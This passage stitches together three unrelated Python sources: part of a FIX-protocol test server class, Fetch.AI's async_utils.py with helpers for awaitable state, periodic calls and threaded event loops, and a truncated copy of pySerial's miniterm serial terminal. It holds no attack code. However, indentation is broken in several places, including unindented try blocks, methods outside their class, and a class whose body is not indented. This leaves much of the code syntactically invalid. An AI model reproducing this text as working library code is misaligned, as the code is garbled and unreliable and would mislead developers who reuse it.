    session-control messages from logged-on connections are echoed;
    data messages are queued for :meth:`receive`; a logon message
    registers the connection; anything else before logon is an error.

    :param fdesc: File descriptor of connection message was received from.
    :type fdesc: ``int``
    :param msg: Fix message received.
    :type msg: ``FixMessage``
    """
    # Swap the peer's target (56) / sender (49) comp ids: that pair is
    # the connection name from this server's point of view.
    conn_name = (msg[56], msg[49])
    if _has_logout_tag(msg):
        self._no_lock_send(msg, conn_name, fdesc)
        self._remove_connection(fdesc)
    elif self._conn_loggedon(conn_name):
        if _is_session_control_msg(msg):
            # Session-level messages are acknowledged, not queued.
            self.log_callback(
                "Session control msg from {}".format(conn_name)
            )
            self._no_lock_send(msg, conn_name)
        else:
            self.log_callback(
                "Incoming data msg from {}".format(conn_name)
            )
            self._conndetails_by_name[conn_name].in_seqno += 1
            self._conndetails_by_name[conn_name].queue.put(msg, True, 1)
    elif _has_logon_tag(msg):
        self._logon_connection(fdesc, conn_name)
        self._no_lock_send(msg, conn_name)
    else:
        raise Exception(
            "Connection {} sent msg before logon".format(conn_name)
        )
def _conn_loggedon(self, conn_name):
    """
    Check if given connection is logged on.

    A connection appears in the by-name map only after a logon message
    was processed by :meth:`_logon_connection`.

    :param conn_name: Connection name.
    :type conn_name: ``tuple`` of ``str`` and ``str``

    :return: ``True`` if it is a connection has already logged on
    :rtype: ``bool``
    """
    return conn_name in self._conndetails_by_name
def _logon_connection(self, fdesc, conn_name):
    """
    Logon given connection for given file descriptor.

    :param fdesc: File descriptor of connection.
    :type fdesc: ``int``
    :param conn_name: Connection name.
    :type conn_name: ``tuple`` of ``str`` and ``str``
    """
    conndetails = self._conndetails_by_fd[fdesc]
    conndetails.name = conn_name
    # Fresh inbox and sequence numbers for the new FIX session.
    conndetails.queue = queue.Queue()
    conndetails.in_seqno = 1
    conndetails.out_seqno = 1
    self._conndetails_by_name[conn_name] = conndetails
    # Remember the first logon; it is the default for send()/receive()
    # when callers pass (None, None).
    if self._first_sender is None:
        (self._first_sender, self._first_target) = conn_name
    self.log_callback("Logged on connection {}.".format(conn_name))
def active_connections(self):
    """
    Returns a list of currently active connections

    :return: List of active connection names (each a tuple of sender and
        target)
    :rtype: ``list`` of ``tuple`` of ``str`` and ``str``
    """
    # Connections that have not logged on yet still have name=None and
    # are filtered out here.
    all_names = (details.name for details in self._conndetails_by_fd.values())
    return [name for name in all_names if name is not None]
def is_connection_active(self, conn_name):
    """
    Checks whether the given connection is currently active.

    :param conn_name: Connection name to be checked if active
    :type conn_name: ``tuple`` of ``str`` and ``str``

    :return: ``True`` if the given connection is active. ``False`` otherwise
    :rtype: ``bool``
    """
    return conn_name in self._conndetails_by_name
def stop(self):
    """
    Close the connection.

    Clears the listening flag so the receiver thread exits its poll
    loop (tearing down all connections), then waits for it to finish.
    """
    self._listening = False
    if self._recv_thread:
        self._recv_thread.join()
    self.log_callback("Stopped server.")
def _validate_connection_name(self, conn_name):
    """
    Check if given connection name is valid.

    If this is ``(None, None)``, then the connection defaults to the one
    and only existing active connection. If there are more active
    connections or the initial connection is no longer valid this will fail.

    The tuple of ``(sender, target)`` represents the connection name.

    :param conn_name: (sender id, target id) tuple, or ``(None, None)``
        to select the default connection.
    :type conn_name: ``tuple`` of ``str`` and ``str``

    :return: Connection name to send message to.
    :rtype: ``tuple`` of ``str`` and ``str``
    """
    sender, target = conn_name
    if (sender, target) == (None, None):
        if len(self._conndetails_by_name) != 1:
            raise Exception(
                "Cannot use default connection "
                "since more connections active"
            )
        # Default to the very first connection that ever logged on; if
        # that one is gone the active check below fails.
        (sender, target) = (self._first_sender, self._first_target)
    if not self.is_connection_active((sender, target)):
        raise Exception(
            "Connection {} not active".format((sender, target))
        )
    return sender, target
def _add_msg_tags(self, msg, conn_name, fdesc=None):
    """
    Add session tags and senderCompID and targetCompID tags to the given
    FIX message.

    :param msg: Message to be sent.
    :type msg: ``FixMessage``
    :param conn_name: (sender id, target id) tuple naming the connection.
    :type conn_name: ``tuple`` of ``str`` and ``str``
    :param fdesc: optional file descriptor; when given, the connection
        details are looked up by fd instead of by name.
    :type fdesc: ``int`` or ``NoneType``

    :return: The FIX msg with the tags set.
    :rtype: ``FixMessage``
    """
    sender, target = conn_name
    msg[8] = self.version  # BeginString
    if fdesc:
        conndetails = self._conndetails_by_fd[fdesc]
    else:
        conndetails = self._conndetails_by_name[(sender, target)]
    msg[34] = conndetails.out_seqno  # sequence number, bumped per message
    conndetails.out_seqno += 1
    msg[49] = sender  # SenderCompID
    msg[56] = target  # TargetCompID
    # Prefer the codec's own timestamp helper when it provides one.
    msg[52] = getattr(self.codec, "utc_timestamp", utc_timestamp)()
    return msg
def _no_lock_send(self, msg, conn_name, fdesc=None):
    """
    Send the given Fix message through the given connection, expecting
    the lock is already acquired.

    The message will be enriched with session tags and sequence numbers.

    :param msg: message to be sent
    :type msg: ``FixMessage``
    :param conn_name: (sender id, target id) tuple naming the connection.
    :type conn_name: ``tuple`` of ``str`` and ``str``
    :param fdesc: optional file descriptor; used to reach connections
        that have no by-name entry (e.g. logout before logon).
    :type fdesc: ``int`` or ``NoneType``
    """
    sender, target = conn_name
    msg = self._add_msg_tags(msg, (sender, target), fdesc)
    self.log_callback(
        "Sending on connection {} message {}".format((sender, target), msg)
    )
    if fdesc:
        self._conndetails_by_fd[fdesc].connection.send(
            msg.to_wire(self.codec)
        )
    else:
        self._conndetails_by_name[(sender, target)].connection.send(
            msg.to_wire(self.codec)
        )
def send(self, msg, conn_name=(None, None)):
    """
    Send the given Fix message through the given connection.

    The message will be enriched with session tags and sequence numbers.

    The connection name - (sender, target) - defaults to (None, None).
    In this case, the server will try to find the one and only available
    connection. This will fail if there are more connections available or
    if the initial connection is no longer active.

    :param msg: Message to be sent.
    :type msg: ``FixMessage``
    :param conn_name: Connection name to send message to. This is the tuple
        (sender id, target id)
    :type conn_name: ``tuple`` of ``str`` and ``str``

    :return: Fix message sent
    :rtype: ``FixMessage``
    """
    with self._lock:
        # Validate once, under the lock, so the connection cannot be
        # removed between validation and the actual send (the original
        # code validated three times, twice without need).
        conn_name = self._validate_connection_name(conn_name)
        msg = self._add_msg_tags(msg, conn_name)
        self.log_callback(
            "Sending on connection {} message {}".format(conn_name, msg)
        )
        self._conndetails_by_name[conn_name].connection.send(
            msg.to_wire(self.codec)
        )
    return msg
def receive(self, conn_name=(None, None), timeout=30):
    """
    Receive a FIX message from the given connection.

    The connection name defaults to ``(None, None)``. In this case,
    the server will try to find the one and only available connection.
    This will fail if there are more connections available or if the initial
    connection is no longer active.

    :param conn_name: Connection name to receive message from
    :type conn_name: ``tuple`` of ``str`` and ``str``
    :param timeout: timeout in seconds
    :type timeout: ``int``

    :return: Fix message received
    :rtype: ``FixMessage``
    """
    conn_name = self._validate_connection_name(conn_name)
    # Blocks until the receiver thread queues a data message, or raises
    # queue.Empty after the timeout.
    return self._conndetails_by_name[conn_name].queue.get(True, timeout)
def flush(self):
    """
    Flush the receive queues.

    Drops any messages still buffered for every logged-on connection.
    """
    for conndetails in self._conndetails_by_name.values():
        self._flush_queue(conndetails.queue)
    if self.log_callback:
        self.log_callback("Flushed received message queues")
def _flush_queue(self, msg_queue):
    """
    Drain all pending messages from the given receive queue.

    The parameter was previously named ``queue``, shadowing the
    ``queue`` module: ``except queue.Empty`` then looked up ``Empty``
    on the Queue *instance* (which has no such attribute) and raised
    ``AttributeError`` the moment the queue drained. Renaming the
    parameter lets the handler reference the module's exception.

    :param msg_queue: Queue to flush.
    :type msg_queue: ``queue.Queue``
    """
    try:
        while True:
            msg_queue.get(False)
    except queue.Empty:
        return
|
async_utils.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the misc utils for async code."""
import asyncio
import datetime
import logging
import subprocess # nosec
import time
from asyncio import CancelledError
from asyncio.events import AbstractEventLoop, TimerHandle
from asyncio.futures import Future
from asyncio.tasks import Task
from collections.abc import Iterable
from threading import Thread
from typing import (
Any,
Awaitable,
Callable,
Container,
List,
Optional,
Sequence,
Set,
Tuple,
Union,
)
try:
from asyncio import create_task # pylint: disable=ungrouped-imports,unused-import
except ImportError: # pragma: no cover
# for python3.6!
from asyncio import ensure_future as create_task # type: ignore # noqa: F401 # pylint: disable=ungrouped-imports,unused-import
logger = logging.getLogger(__file__)
def ensure_list(value: Any) -> List:
    """Coerce *value* into a list.

    Lists pass through unchanged, other iterables (including strings)
    are expanded element-wise, and scalars are wrapped in a one-item list.
    """
    if isinstance(value, list):
        return value
    return list(value) if isinstance(value, Iterable) else [value]
class AsyncState:
    """Awaitable state.

    Holds a value that can be read (:meth:`get`), replaced (:meth:`set`),
    observed via synchronous callbacks (:meth:`add_callback`) and awaited
    until it becomes one of a set of values (:meth:`wait`).
    """

    def __init__(
        self, initial_state: Any = None, states_enum: Optional[Container[Any]] = None
    ):
        """Init async state.

        :param initial_state: state to set on start.
        :param states_enum: container of valid states if not provided state not checked on set.
        """
        self._state = initial_state
        # One Future per in-flight wait(); resolved on a matching transition.
        self._watchers: Set[Future] = set()
        # Synchronous observers invoked on every state change.
        self._callbacks: List[Callable[[Any], None]] = []
        self._states_enum = states_enum

    def set(self, state: Any) -> None:
        """Set state."""
        if self._states_enum is not None and state not in self._states_enum:
            raise ValueError(
                f"Unsupported state: {state}. Valid states are {self._states_enum}"
            )
        if self._state == state:  # pragma: no cover
            # Re-setting the same state is a no-op: nothing is notified.
            return
        # Notify before committing so handlers can still read the old
        # value through self._state.
        self._state_changed(state)
        self._state = state

    def add_callback(self, callback_fn: Callable[[Any], None]) -> None:
        """
        Add callback to track state changes.

        :param callback_fn: callable object to be called on state changed.

        :return: None
        """
        self._callbacks.append(callback_fn)

    def get(self) -> Any:
        """Get state."""
        return self._state

    def _state_changed(self, state: Any) -> None:
        """Fulfill watchers for state."""
        for callback_fn in self._callbacks:
            try:
                callback_fn(state)
            except Exception:  # pylint: disable=broad-except
                # One failing callback must not block the others.
                logger.exception(f"Exception on calling {callback_fn}")
        for watcher in list(self._watchers):
            if state not in watcher._states:  # type: ignore # pylint: disable=protected-access # pragma: nocover
                continue
            if not watcher.done():
                # Resolve on the watcher's own loop: wait() may have been
                # called from a different thread than this set().
                watcher._loop.call_soon_threadsafe(  # pylint: disable=protected-access
                    self._watcher_result_callback(watcher), (self._state, state)
                )
            self._remove_watcher(watcher)

    def _remove_watcher(self, watcher: Future) -> None:
        """Remove watcher for state wait."""
        try:
            self._watchers.remove(watcher)
        except KeyError:
            # Already removed (e.g. fulfilled and cleaned up by wait()).
            pass

    @staticmethod
    def _watcher_result_callback(watcher: Future) -> Callable:
        """Create callback for watcher result."""
        # docstyle.
        def _callback(result):
            if watcher.done():  # pragma: nocover
                return
            watcher.set_result(result)

        return _callback

    async def wait(self, state_or_states: Union[Any, Sequence[Any]]) -> Tuple[Any, Any]:
        """Wait state to be set.

        :params state_or_states: state or list of states.
        :return: tuple of previous state and new state.
        """
        states = ensure_list(state_or_states)

        if self._state in states:
            # Already in a requested state: no transition, so no old value.
            return (None, self._state)

        watcher: Future = Future()
        # The accepted states ride on the Future itself; _state_changed
        # reads them back to decide whether to resolve this watcher.
        watcher._states = states  # type: ignore # pylint: disable=protected-access
        self._watchers.add(watcher)
        try:
            return await watcher
        finally:
            self._remove_watcher(watcher)
class PeriodicCaller:
    """
    Schedule a periodic call of callable using event loop.

    Used for periodic function run using asyncio.
    """

    def __init__(
        self,
        callback: Callable,
        period: float,
        start_at: Optional[datetime.datetime] = None,
        exception_callback: Optional[Callable[[Callable, Exception], None]] = None,
        loop: Optional[AbstractEventLoop] = None,
    ):
        """
        Init periodic caller.

        :param callback: function to call periodically
        :param period: period in seconds.
        :param start_at: optional first call datetime
        :param exception_callback: optional handler to call on exception raised.
        :param loop: optional asyncio event loop
        """
        self._loop = loop or asyncio.get_event_loop()
        self._periodic_callable = callback
        self._start_at = start_at or datetime.datetime.now()
        self._period = period
        # None until start(); also serves as the "is scheduled" flag.
        self._timerhandle: Optional[TimerHandle] = None
        self._exception_callback = exception_callback

    def _callback(self) -> None:
        """Call on each scheduled call."""
        # Re-arm first so a raising callable does not kill the schedule.
        self._schedule_call()
        try:
            self._periodic_callable()
        except Exception as exception:  # pylint: disable=broad-except
            if not self._exception_callback:  # pragma: nocover
                raise
            self._exception_callback(self._periodic_callable, exception)

    def _schedule_call(self) -> None:
        """Set schedule for call."""
        if self._timerhandle is None:
            # First call honours start_at (delay clamps to 0 if past).
            ts = time.mktime(self._start_at.timetuple())
            delay = max(0, ts - time.time())
            self._timerhandle = self._loop.call_later(delay, self._callback)
        else:
            self._timerhandle = self._loop.call_later(self._period, self._callback)

    def start(self) -> None:
        """Activate period calls."""
        if self._timerhandle:  # pragma: nocover
            # Already scheduled.
            return
        self._schedule_call()

    def stop(self) -> None:
        """Remove from schedule."""
        if not self._timerhandle:  # pragma: nocover
            return
        self._timerhandle.cancel()
        self._timerhandle = None
def ensure_loop(loop: Optional[AbstractEventLoop] = None) -> AbstractEventLoop:
    """
    Use loop provided or create new if not provided or closed.

    Return loop passed if its provided,not closed and not running, otherwise returns new event loop.

    :param loop: optional event loop
    :return: asyncio event loop
    """
    try:
        loop = loop or asyncio.new_event_loop()
        # Explicit checks instead of ``assert`` so the guarantees survive
        # ``python -O`` (asserts are stripped under optimization).
        if loop.is_closed() or loop.is_running():
            loop = asyncio.new_event_loop()
    except RuntimeError:
        loop = asyncio.new_event_loop()
    return loop
class AnotherThreadTask:
    """
    Schedule a task to run on the loop in another thread.

    Provides better cancel behaviour: on cancel it will wait till cancelled completely.
    """

    def __init__(self, coro: Awaitable, loop: AbstractEventLoop) -> None:
        """
        Init the task.

        :param coro: coroutine to schedule
        :param loop: an event loop to schedule on.
        """
        self._loop = loop
        self._coro = coro
        # Set inside the target loop once _get_task_result starts running.
        self._task: Optional[asyncio.Task] = None
        self._future = asyncio.run_coroutine_threadsafe(self._get_task_result(), loop)

    async def _get_task_result(self) -> Any:
        """
        Get task result, should be run in target loop.

        :return: task result value or raise an exception if task failed
        """
        self._task = self._loop.create_task(self._coro)
        return await self._task

    def result(self, timeout: Optional[float] = None) -> Any:
        """
        Wait for coroutine execution result.

        :param timeout: optional timeout to wait in seconds.
        """
        return self._future.result(timeout)

    def cancel(self) -> None:
        """Cancel coroutine task execution in a target loop."""
        if self._task is None:
            # Wrapper coroutine has not started yet: cancel the outer future.
            self._loop.call_soon_threadsafe(self._future.cancel)
        else:
            self._loop.call_soon_threadsafe(self._task.cancel)

    def done(self) -> bool:
        """Check task is done."""
        return self._future.done()
class ThreadedAsyncRunner(Thread):
    """Util to run thread with event loop and execute coroutines inside."""

    def __init__(self, loop=None) -> None:
        """
        Init threaded runner.

        :param loop: optional event loop. is it's running loop, threaded runner will use it.
        """
        self._loop = loop or asyncio.new_event_loop()
        # NOTE(review): assert is stripped under ``python -O``; an explicit
        # check-and-raise would be more robust here.
        assert not self._loop.is_closed()
        super().__init__(daemon=True)

    def start(self) -> None:
        """Start event loop in dedicated thread."""
        if self.is_alive() or self._loop.is_running():  # pragma: nocover
            return
        super().start()
        # Run a trivial coroutine to block until the loop is actually up.
        self.call(asyncio.sleep(0.001)).result(1)

    def run(self) -> None:
        """Run code inside thread."""
        logger.debug("Starting threaded asyncio loop...")
        asyncio.set_event_loop(self._loop)
        self._loop.run_forever()
        logger.debug("Asyncio loop has been stopped.")

    def call(self, coro: Awaitable) -> Any:
        """
        Run a coroutine inside the event loop.

        :param coro: a coroutine to run.
        """
        return AnotherThreadTask(coro, self._loop)

    def stop(self) -> None:
        """Stop event loop in thread."""
        logger.debug("Stopping...")

        if not self.is_alive():  # pragma: nocover
            return

        if self._loop.is_running():
            logger.debug("Stopping loop...")
            self._loop.call_soon_threadsafe(self._loop.stop)

        logger.debug("Wait thread to join...")
        self.join(10)
        logger.debug("Stopped.")
async def cancel_and_wait(task: Optional[Task]) -> Any:
    """Cancel *task* if still running, await it, and swallow CancelledError.

    Returns the task's result when it already finished, or the caught
    CancelledError instance when the cancellation took effect.
    """
    if not task:  # pragma: nocover
        return
    try:
        if not task.done():
            task.cancel()
        return await task
    except CancelledError as e:
        return e
class AwaitableProc:
    """
    Async-friendly subprocess.Popen

    Wraps a blocking ``Popen`` + ``wait()`` pair so a coroutine can await
    the subprocess's return code without blocking the event loop.
    """

    def __init__(self, *args, **kwargs):
        # args/kwargs are forwarded verbatim to subprocess.Popen in start().
        self.args = args
        self.kwargs = kwargs
        self.proc = None
        self._thread = None
        self.loop = None
        self.future = None

    async def start(self):
        """Start the subprocess"""
        self.proc = subprocess.Popen(*self.args, **self.kwargs)  # nosec
        self.loop = asyncio.get_event_loop()
        self.future = asyncio.futures.Future()
        # proc.wait() blocks, so it runs in a helper thread that resolves
        # the future back on this loop when the process exits.
        self._thread = Thread(target=self._in_thread)
        self._thread.start()
        try:
            # shield: cancelling start() must not abandon the subprocess.
            return await asyncio.shield(self.future)
        except asyncio.CancelledError:  # pragma: nocover
            self.proc.terminate()
            return await self.future
        finally:
            self._thread.join()

    def _in_thread(self):
        # Runs in the helper thread: block until exit, then hand the
        # return code back to the event loop thread.
        self.proc.wait()
        self.loop.call_soon_threadsafe(self.future.set_result, self.proc.returncode)
|
miniterm.py | #!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
    """generate a readable description for a key"""
    code = ord(character)
    # Control characters (< 32) print as Ctrl+<letter>; '@' is code 64,
    # so Ctrl+A is chr(64 + 1), etc. Everything else is shown via repr().
    return 'Ctrl+{:c}'.format(ord('@') + code) if code < 32 else repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
    """OS abstraction for console (input/output codec, no echo)

    Platform-specific subclasses (``Console``) override setup/cleanup,
    getkey and cancel; the base class only knows how to write.
    """

    def __init__(self):
        if sys.version_info >= (3, 0):
            # Python 3: the binary layer sits behind stdout.buffer.
            self.byte_output = sys.stdout.buffer
        else:
            self.byte_output = sys.stdout
        self.output = sys.stdout

    def setup(self):
        """Set console to read single characters, no echo"""

    def cleanup(self):
        """Restore default console settings"""

    def getkey(self):
        """Read a single key from the console"""
        return None

    def write_bytes(self, byte_string):
        """Write bytes (already encoded)"""
        self.byte_output.write(byte_string)
        self.byte_output.flush()

    def write(self, text):
        """Write string"""
        self.output.write(text)
        self.output.flush()

    def cancel(self):
        """Cancel getkey operation"""

    # - - - - - - - - - - - - - - - - - - - - - - - -
    # context manager:
    # switch terminal temporary to normal mode (e.g. to get user input)
    def __enter__(self):
        self.cleanup()
        return self

    def __exit__(self, *args, **kwargs):
        self.setup()
# Platform-specific Console implementation: Windows (msvcrt + code page
# switching), POSIX (termios raw mode), otherwise unsupported.
if os.name == 'nt':  # noqa
    import msvcrt
    import ctypes

    class Out(object):
        """file-like wrapper that uses os.write"""

        def __init__(self, fd):
            self.fd = fd

        def flush(self):
            pass

        def write(self, s):
            os.write(self.fd, s)

    class Console(ConsoleBase):
        def __init__(self):
            super(Console, self).__init__()
            # Save current code pages so __del__ can restore them.
            self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
            self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
            # 65001 is the UTF-8 code page.
            ctypes.windll.kernel32.SetConsoleOutputCP(65001)
            ctypes.windll.kernel32.SetConsoleCP(65001)
            self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
            # the change of the code page is not propagated to Python, manually fix it
            sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
            sys.stdout = self.output
            self.output.encoding = 'UTF-8'  # needed for input

        def __del__(self):
            # Restore the code pages saved in __init__.
            ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
            ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)

        def getkey(self):
            while True:
                z = msvcrt.getwch()
                if z == unichr(13):
                    # ENTER arrives as CR; normalize to LF.
                    return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):  # functions keys, ignore
                    msvcrt.getwch()
                else:
                    return z

        def cancel(self):
            # CancelIo, CancelSynchronousIo do not seem to work when using
            # getwch, so instead, send a key to the window with the console
            hwnd = ctypes.windll.kernel32.GetConsoleWindow()
            ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)

elif os.name == 'posix':
    import atexit
    import termios
    import fcntl

    class Console(ConsoleBase):
        def __init__(self):
            super(Console, self).__init__()
            self.fd = sys.stdin.fileno()
            # Remember the original tty attributes for cleanup().
            self.old = termios.tcgetattr(self.fd)
            atexit.register(self.cleanup)
            if sys.version_info < (3, 0):
                self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
            else:
                self.enc_stdin = sys.stdin

        def setup(self):
            # Raw-ish mode: no line buffering, no echo, no signal keys;
            # read() returns after exactly one character.
            new = termios.tcgetattr(self.fd)
            new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
            new[6][termios.VMIN] = 1
            new[6][termios.VTIME] = 0
            termios.tcsetattr(self.fd, termios.TCSANOW, new)

        def getkey(self):
            c = self.enc_stdin.read(1)
            if c == unichr(0x7f):
                c = unichr(8)  # map the BS key (which yields DEL) to backspace
            return c

        def cancel(self):
            # Inject a NUL byte into the tty input to unblock read(1).
            fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')

        def cleanup(self):
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)

else:
    raise NotImplementedError(
        'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
    """do-nothing: forward all data unchanged

    Base class for character transformations; subclasses override any of
    ``rx``/``tx``/``echo``.
    """

    def rx(self, text):
        """text received from serial port"""
        return text

    def tx(self, text):
        """text to be sent to serial port"""
        return text

    def echo(self, text):
        """text to be sent but displayed on console"""
        return text
class CRLF(Transform):
    """ENTER sends CR+LF"""

    def tx(self, text):
        # expand every LF into CR+LF on the way out
        return '\r\n'.join(text.split('\n'))
class CR(Transform):
    """ENTER sends CR"""

    def rx(self, text):
        # incoming CR displays as a newline
        return text.translate({ord('\r'): '\n'})

    def tx(self, text):
        # outgoing newline becomes a bare CR
        return text.translate({ord('\n'): '\r'})
class LF(Transform):
    """ENTER sends LF"""
    # No overrides needed: LF is already the internal newline.
class NoTerminal(Transform):
    """remove typical terminal control codes from input"""

    # Map each C0 control char (except CR/LF/BS/TAB) to its Unicode
    # "control picture" (U+2400 block) so it is displayed, not executed.
    REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
    REPLACEMENT_MAP.update(
        {
            0x7F: 0x2421,  # DEL
            0x9B: 0x2425,  # CSI
        })

    def rx(self, text):
        return text.translate(self.REPLACEMENT_MAP)

    # echoed text gets the same scrubbing as received text
    echo = rx
class NoControls(NoTerminal):
    """Remove all control codes, incl. CR+LF"""

    # Unlike NoTerminal, every C0 control char (including CR/LF/TAB/BS)
    # is replaced by its U+2400 "control picture".
    REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
    REPLACEMENT_MAP.update(
        {
            0x20: 0x2423,  # visual space
            0x7F: 0x2421,  # DEL
            0x9B: 0x2425,  # CSI
        })
class Printable(Transform):
    """Show decimal code for all non-ASCII characters and replace most control codes"""

    def rx(self, text):
        rendered = []
        for ch in text:
            if ' ' <= ch < '\x7f' or ch in '\r\n\b\t':
                # plain printable ASCII (plus common whitespace) passes through
                rendered.append(ch)
            elif ch < ' ':
                # control char -> U+2400 "control picture"
                rendered.append(unichr(0x2400 + ord(ch)))
            else:
                # non-ASCII -> decimal code point rendered as subscripts
                rendered.extend(
                    unichr(0x2080 + ord(digit) - 48)
                    for digit in '{:d}'.format(ord(ch))
                )
                rendered.append(' ')
        return ''.join(rendered)

    echo = rx
class Colorize(Transform):
    """Apply different colors for received and echo"""

    def __init__(self):
        # XXX make it configurable, use colorama?
        self.input_color = '\x1b[37m'  # ANSI white for received data
        self.echo_color = '\x1b[31m'  # ANSI red for locally echoed keys

    def rx(self, text):
        return self.input_color + text

    def echo(self, text):
        return self.echo_color + text
class DebugIO(Transform):
    """Print what is sent and received"""

    def rx(self, text):
        # Trace to stderr so it does not mix with console output.
        sys.stderr.write(' [RX:{}] '.format(repr(text)))
        sys.stderr.flush()
        return text

    def tx(self, text):
        sys.stderr.write(' [TX:{}] '.format(repr(text)))
        sys.stderr.flush()
        return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character

# Maps eol names to their newline transformation class.
EOL_TRANSFORMATIONS = {
    'crlf': CRLF,
    'cr': CR,
    'lf': LF,
}

# Maps filter names to transformation classes (see Miniterm.filters).
TRANSFORMATIONS = {
    'direct': Transform,    # no transformation
    'default': NoTerminal,
    'nocontrol': NoControls,
    'printable': Printable,
    'colorize': Colorize,
    'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
    """\
    Show a list of ports and ask the user for a choice. To make selection
    easier on systems with long device names, also allow the input of an
    index.
    """
    sys.stderr.write('\n--- Available ports:\n')
    ports = []
    for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
        sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
        ports.append(port)
    while True:
        port = raw_input('--- Enter port index or full name: ')
        try:
            index = int(port) - 1
            if not 0 <= index < len(ports):
                sys.stderr.write('--- Invalid index!\n')
                continue
        except ValueError:
            # Not a number: treat the input as a literal port name.
            pass
        else:
            port = ports[index]
        return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
    """
    :param serial_instance: an open serial port object to talk to
    :param echo: locally echo typed characters when True
    :param eol: newline mode, a key of EOL_TRANSFORMATIONS
    :param filters: names of TRANSFORMATIONS to apply to the data
    """
    self.console = Console()
    self.serial = serial_instance
    self.echo = echo
    self.raw = False
    self.input_encoding = 'UTF-8'
    self.output_encoding = 'UTF-8'
    self.eol = eol
    self.filters = filters
    self.update_transformations()
    # BUGFIX: writer()/handle_menu_key() compare these against the
    # single-character strings returned by Console.getkey(); stored as
    # bare ints the comparisons could never match, so the exit and menu
    # keys were dead. Store them as characters instead.
    self.exit_character = unichr(0x1d)  # GS/CTRL+]
    self.menu_character = unichr(0x14)  # Menu: CTRL+T
    self.alive = None
    self._reader_alive = None
    self.receiver_thread = None
    self.rx_decoder = None
    self.tx_decoder = None
def _start_reader(self):
    """Start reader thread"""
    self._reader_alive = True
    # daemon thread that copies serial -> console
    rx_thread = threading.Thread(target=self.reader, name='rx')
    rx_thread.daemon = True
    self.receiver_thread = rx_thread
    rx_thread.start()
def _stop_reader(self):
    """Stop reader thread only, wait for clean exit of thread"""
    self._reader_alive = False
    if hasattr(self.serial, 'cancel_read'):
        # Abort a blocking serial read so the thread notices the flag.
        self.serial.cancel_read()
    self.receiver_thread.join()
def start(self):
    """start worker threads"""
    self.alive = True
    self._start_reader()
    # console->serial copying runs in its own daemon thread
    tx_thread = threading.Thread(target=self.writer, name='tx')
    tx_thread.daemon = True
    self.transmitter_thread = tx_thread
    tx_thread.start()
    self.console.setup()
def stop(self):
    """set flag to stop worker threads"""
    # Both threads poll self.alive and exit on their next iteration.
    self.alive = False
def join(self, transmit_only=False):
    """wait for worker threads to terminate"""
    self.transmitter_thread.join()
    if not transmit_only:
        if hasattr(self.serial, 'cancel_read'):
            # Abort a blocking serial read so the reader can exit.
            self.serial.cancel_read()
        self.receiver_thread.join()
def close(self):
    """Close the underlying serial port."""
    self.serial.close()
def update_transformations(self):
    """take list of transformation classes and instantiate them for rx and tx"""
    classes = [EOL_TRANSFORMATIONS[self.eol]]
    classes.extend(TRANSFORMATIONS[f] for f in self.filters)
    self.tx_transformations = [cls() for cls in classes]
    # rx applies the same transformations in reverse order
    self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
    """set encoding for received data"""
    self.input_encoding = encoding
    # Incremental decoder copes with multi-byte sequences split across reads.
    self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
    """set encoding for transmitted data"""
    self.output_encoding = encoding
    # NOTE(review): this creates ``tx_encoder`` (used by writer()), while
    # __init__ only pre-initializes ``tx_decoder`` - looks like the
    # attribute names diverged; confirm which is intended.
    self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
    """Write current settings to sys.stderr"""
    sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
        p=self.serial))
    # Output control lines (driven by us).
